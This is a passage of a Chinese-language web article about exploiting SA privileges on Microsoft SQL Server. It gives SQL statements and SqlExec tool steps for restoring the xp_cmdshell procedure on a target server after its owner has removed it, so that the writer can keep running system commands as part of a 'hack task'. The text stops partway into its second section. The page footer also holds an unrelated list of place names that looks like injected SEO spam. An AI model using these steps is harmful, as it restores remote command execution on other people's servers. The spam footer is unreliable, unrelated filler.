新聞中心

        EEPW首頁 > 手機與無線通信 > 設計應用 > Microsoft SQL Server數據庫SA權限總結

        Microsoft SQL Server數據庫SA權限總結

        作者: 時間:2017-06-13 來源:網絡 收藏
        需要準備的工具:

        SQL Query Analyzer和SqlExec Sunx Version  

        第一部分:  

        去掉xp_cmdshell保護系統的具體分析:

        語句如下:

        1.去掉xp_cmdshell擴展過程的方法是使用如下語句:

        if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

        2.添加xp_cmdshell擴展過程的方法是使用如下語句:

        sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

        現在看看現象:

        我們在取得后遠程用Sqlexec執行cmd命令,出現提示SQL_ERROR,那么很可能是去掉了xp_cmdshell。  

        現在來看看被去掉xp_cmdshell后恢復的兩種方法:  

        方法一、使用SQL Query Analyzer連接對方后直接寫入,挺方便sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

        方法二、使用SqlExec Sunx Version首先在SqlExec Sunx Version的Format選項里填上%s,在CMD選項里輸入sp_addextendedproc 'xp_cmdshell','xpsql70.dll'或者對Sql2000情況下使用sp_addextendedproc 'xp_cmdshell','xplog70.dll'另外使用SqlExec Sunx Version來去除xp_cmdshell的方法和加的時候選擇條件一樣,然后輸入sp_dropextendedproc 'xp_cmdshell'就可以了。

        第二部分:  

        假如對方已經把xplog70.dll刪除或者改了名,我們來用下面的方法繼續我們的hack任務:  

        當出現如下現象暗示代表很有可能是xplog70.dll刪除或者改了名。  

        在查詢分析器中寫入sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'提示中已存在名為'xp_cmdshell'的對象。


        評論


        相關推薦

        技術專區

        關閉
        主站蜘蛛池模板: 绿春县| 和田市| 英超| 靖安县| 凤台县| 钦州市| 北京市| 漳平市| 湘潭县| 扎鲁特旗| 大邑县| 台北市| 平度市| 罗田县| 钟祥市| 临朐县| 福建省| 阜宁县| 牙克石市| 万盛区| 长葛市| 和龙市| 菏泽市| 海伦市| 贡嘎县| 惠东县| 苏尼特左旗| 育儿| 利川市| 礼泉县| 赣榆县| 镇坪县| 东明县| 五华县| 吉木萨尔县| 龙川县| 黄石市| 平度市| 武城县| 商丘市| 禹城市|